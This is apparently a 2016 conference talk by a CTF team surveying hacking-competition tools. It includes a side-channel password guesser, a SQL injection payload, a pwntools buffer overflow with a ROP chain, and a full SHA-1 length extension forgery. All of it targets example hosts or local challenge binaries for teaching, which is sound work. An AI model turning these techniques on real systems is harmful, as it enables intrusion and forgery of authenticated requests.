A CTF Hackers Toolbox Grazer Linuxtage 2016

$ who

mike / @f0rki
CS/InfoSec Student, CTF Player since 2010

@stefan2904
CS/InfoSec/CI Student, CTF Player since 2014

CTF: Capture The Flag

Collaborative hacking competitions, Teams vs. Teams

The goal is to capture flags, e.g.

CTF{THIS_IS_A_FLAG}

CTF Type: Jeopardy

Figure: Sharif CTF Challenge Board

CTF Type: Attack-Defense

Figure: RUCTFe 2015 Network Schema (source: RUCTF org)

CTF Type: Attack-Defense

Figure: FAUST CTF 2015 scoreboard

Why CTFs?

- It's fun!
- Gain experience in Information Security
- Challenges modeled after real-world problems
- Sometimes real-world bugs modeled after CTF bugs?

LosFuzzys: A CTF Team in Graz

We Like Bugs!


- A group of people interested in information security
- Primarily CS/SW/ICE Students from TU Graz
- But we welcome anyone interested and motivated :) and maybe even you ;)
- Irregular Meet-ups

Where to start?

- Talk to us! :-) https://hack.more.systems, twitter: @LosFuzzys
- Read writeups! Repo: github.com/ctfs, Ours: hack.more.systems/writeups

CTF Toolbox


- Great diversity of challenges
- Some things turn up frequently
- Knowledge of technology necessary
- Experience helps a lot
- Using the right tools is essential, assuming you know how to use them . . .

Scripting is your best Friend

- Be comfortable in automating things
- Use whatever works best: bash, zsh etc.; Python, Ruby etc.

Command-Line-Fu is very helpful

- Standard utils – grep, sed, awk, sort, cut, uniq, . . .
- Network stuff – nc, socat, dig, nmap
- Query JSON – jq
- HTTP – curl
- ...

Pipe together to get your results!

Bash Password Guessing

```bash
for x in q w e r t y u i o p a s d f g h j k l z \
         x c v b n m Q W E R T Y U I O P A S D F G H J \
         K L Z X C V B N M 1 2 3 4 5 6 7 8 9 0 "-" "_" "?"
do
    echo "= $x ="
    # count sigaction syscalls
    strace ./stage3.bin "Did_you_l$x$x$x$x$x$x$x$x" 2>&1 \
        | grep sigaction \
        | wc -l
done > log
# get highest count of sigactions and triggering char
# (sort -n: counts are numbers, a plain sort would rank "9" above "10";
#  grep -x: match the whole line, so "1" does not also hit "10")
cat log | grep -x -B 1 "$(cat log | grep -v = | sort -n | tail -n 1)"
```
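The same side channel scripted in Python, as an added example that is not part of the original slides: the binary leaks how far the password check got through the number of sigaction() calls it makes, so for every candidate character we run it under strace, count those calls, and keep the character with the highest count. The strace excerpt below is constructed (a real run prints thousands of lines), `./stage3.bin` and the `Did_you_l` prefix are taken from the slide, and the strace-driven `run_and_count()`/`guess_next_char()` helpers assume strace is installed.

```python
import re
import string
import subprocess

# Constructed excerpt of what `strace ./stage3.bin <guess>` prints on stderr.
SAMPLE_STRACE = r"""
execve("./stage3.bin", ["./stage3.bin", "Did_you_laaaaaaaa"], [/* 20 vars */]) = 0
brk(NULL)                               = 0x804d000
rt_sigaction(SIGSEGV, {sa_handler=0x8048a10, sa_mask=[], sa_flags=SA_RESTORER}, NULL, 8) = 0
rt_sigaction(SIGSEGV, {sa_handler=0x8048a10, sa_mask=[], sa_flags=SA_RESTORER}, NULL, 8) = 0
rt_sigaction(SIGSEGV, {sa_handler=0x8048a10, sa_mask=[], sa_flags=SA_RESTORER}, NULL, 8) = 0
write(1, "Nope\n", 5)                   = 5
exit_group(1)                           = ?
"""

# strace prints the syscall name at the start of the line; on Linux the
# libc sigaction() wrapper shows up as rt_sigaction().
SIGACTION_RE = re.compile(r'^(?:rt_)?sigaction\(')


def count_sigactions(strace_text):
    """Count sigaction()/rt_sigaction() calls in strace output."""
    return sum(1 for line in strace_text.splitlines() if SIGACTION_RE.match(line))


def best_guess(counts):
    """Candidate with the highest count, compared numerically (the shell
    `sort | uniq | tail -n 1` idiom compares strings, so "9" would beat "10")."""
    return max(counts, key=counts.get)


def run_and_count(binary, argument):
    """Run the target under strace and count its sigaction calls.
    strace writes the trace to stderr. Assumes strace is installed."""
    proc = subprocess.run(['strace', binary, argument],
                          capture_output=True, text=True)
    return count_sigactions(proc.stderr)


def guess_next_char(binary, prefix, fill_width,
                    alphabet=string.ascii_letters + string.digits + '-_?'):
    """Try every candidate in the position after `prefix`, padding the rest of
    the input with the same character as the slide does, and return the
    character that triggered the most sigaction calls plus all counts."""
    counts = {c: run_and_count(binary, prefix + c * fill_width) for c in alphabet}
    return best_guess(counts), counts
```

Once one character is known, append it to `prefix`, shrink `fill_width` by one and run `guess_next_char()` again until the count stops growing.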

Automated Browsing – python-requests

```python
import requests

URL = 'http://ctf.example.com'
s = requests.session()
r = s.post(URL + '/login', data={'user': 'fuzzy', 'pass': '1234'})

# GET http://ctf.example.com/vuln?x='%20or%201=1--x
resp = s.get(URL + '/vuln', params={'x': '\' or 1=1 --x'})
# session cookie automagically used here
print(resp.text)  # flag{some_flag_of_some_service}
```

Dirty Networking – pwntools

```python
from pwn import *

r = remote('ctf.example.com', 1337)

# line based
r.recvline()
r.sendline('HELO %s%s%s%s')
r.recvuntil('250 Hello')

data = r.recv(4)
# unpack LE uint32 from bin
i = u32(data)
log.info('received uint32 {}'.format(i))
# pack BE uint32 to bin
r.send(p32(1094795585, endian='big'))
r.recvline()
```

Finding & Analyzing Vulnerabilities

Analyzing Java/.NET Apps

Great decompilers!

- Java/Dalvik bytecode: intellij built-in decompiler (fernflower), procyon, http://www.javadecompilers.com/
- Android apps/Dalvik bytecode: apktool, smali/baksmali, jadx, Xposed
- .NET bytecode: ILSpy, Jetbrains dotPeek

A wild binary appears!

```
$ file ./pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, not stripped
$ objdump -d ./pwn | less
```

Keep Calm And Use radare2 From git

radare2 – example commands

- Search for functions containing "exec": afl~exec
- Show/search all strings in the file: izz, izz~FLAG
- Compute CRC32 over the next 32 bytes: #crc32 32

Binary Decompilers

No really good open source binary decompilers :( The radare guys are working on one.

Commercial/Closed-Source:
- Hex-Rays/IDA Pro Decompiler ($$$)
- Hopper ($)
- retdec (free, webservice, no x86_64)

Debugging?

Debuggers

Use gdb with one of those: PEDA, GEF, pwndbg, voltron, gdb-dashboard

gdb alternatives: lldb, radare2
Newer debugging approaches: qira, rr

Pwning!

```
$ mkfifo ./fifo
$ ./pwn ./fifo & python -c 'print("A" * 4128)' >> ./fifo
[1] 9391
The file has been saved successfully
[1]+ 9391 segmentation fault (core dumped)  ./pwn ./fifo
$ dmesg | tail -n 1
pwn[9391]: segfault at 41414141 ip 0000000041414141 sp 00000000ffb6d340 error 14
```

pwntools again!

```python
from pwn import *  # NOQA

velf = ELF("./pwn")
r = ROP(velf)
r.call("exit", [42])
payload = "A" * 4124 + str(r)
# launch process
vp = process(["./pwn", "./fifo"])
gdb.attach(vp)  # break *0x8048f4e
with open("./fifo", "w") as f:
    f.write(payload)
# forward stdin/stdout to process stdin/stdout
vp.interactive()
```

pwntools/binjitsu

- I/O abstraction (called Tubes)
- ELF parser/info
- Return Oriented Programming (ROP)
- Shellcode: plug'n'pwn shellcode builder
- Binary data "parsing"
- ...

Cryptography

Crypto Tools

- Pen & Paper
- sage CAS & python
- packages implementing attacks, e.g. python-paddingoracle, hashpumpy (hash length extension attack), ...
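What hashpumpy automates, shown as an added example that is not part of the original slides: a hash length extension against SHA-1 when a service signs with SHA1(key || message). The attacker knows only the MAC, the message and the key length, loads the MAC back into SHA-1's internal state, and continues hashing a chosen suffix; the forged message is the original plus the glue padding the server's hash would have appended plus the suffix. The SHA-1 implementation below is my own (hashlib only plays the server), and the key, message and suffix are constructed.

```python
import hashlib
import struct

IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def sha1_padding(total_len):
    """Padding SHA-1 appends to a message of total_len bytes: 0x80, zeros up
    to 56 mod 64, then the bit length as a big-endian 64-bit integer."""
    return b'\x80' + b'\x00' * ((55 - total_len) % 64) + struct.pack('>Q', total_len * 8)


def _compress(state, block):
    """One SHA-1 compression of a 64-byte block into the 5-word state."""
    w = list(struct.unpack('>16I', block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        t = (_rotl(a, 5) + (f & MASK) + e + k + w[i]) & MASK
        a, b, c, d, e = t, a, _rotl(b, 30), c, d
    return tuple((x + y) & MASK for x, y in zip(state, (a, b, c, d, e)))


def sha1_resume(state, data, total_len):
    """Continue SHA-1 from a known internal state over `data`, where total_len
    is the number of bytes the hash covers in total (what the length field in
    the final padding must say)."""
    buf = data + sha1_padding(total_len)
    for i in range(0, len(buf), 64):
        state = _compress(state, buf[i:i + 64])
    return struct.pack('>5I', *state)


def sha1(data):
    return sha1_resume(IV, data, len(data))


def length_extend(mac, message, suffix, key_len):
    """Given mac = SHA1(key || message) and only len(key), return
    (forged_message, forged_mac) such that forged_mac = SHA1(key || forged_message)
    and forged_message = message || glue || suffix."""
    state = struct.unpack('>5I', mac)           # the MAC *is* the state after the last block
    glue = sha1_padding(key_len + len(message))  # padding the server hashed, now part of the message
    forged = message + glue + suffix
    forged_mac = sha1_resume(state, suffix, key_len + len(forged))
    return forged, forged_mac


def forge_and_verify(key, message, suffix):
    """Both sides: the server MACs with the key, the attacker extends without it,
    the server checks the forgery. The key length is assumed known here; in
    practice loop over plausible lengths until the server accepts one."""
    mac = hashlib.sha1(key + message).digest()
    forged, forged_mac = length_extend(mac, message, suffix, len(key))
    ok = hashlib.sha1(key + forged).digest() == forged_mac
    return forged, forged_mac, ok
```

The glue padding ends up inside the forged message, so the attack only works where the verifier tolerates the 0x80/NUL bytes and the length field, e.g. a URL-encoded query string parsed as key=value pairs. HMAC is not affected, which is the fix.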

Learn to Improvise

Premature optimization* is the root of all evil!
* also commenting code
* also clean code

(only true for attack && during CTFs!)
- If it works once, . . . it works!
- Code-reuse between different CTFs!
- Post-CTF code cleanup would be good . . .

A fool with a tool is still a fool!

https://hack.more.systems

Thanks to all LosFuzzys members tuflowgraphy.at realraum IAIK

Writeups of Used Examples

https://hack.more.systems/writeups
- 9447ctf: premonition (web)
- NDH quals 2016: matriochka (reversing)
- NDH quals 2016: secure file reader (pwn)

don’t be eve!
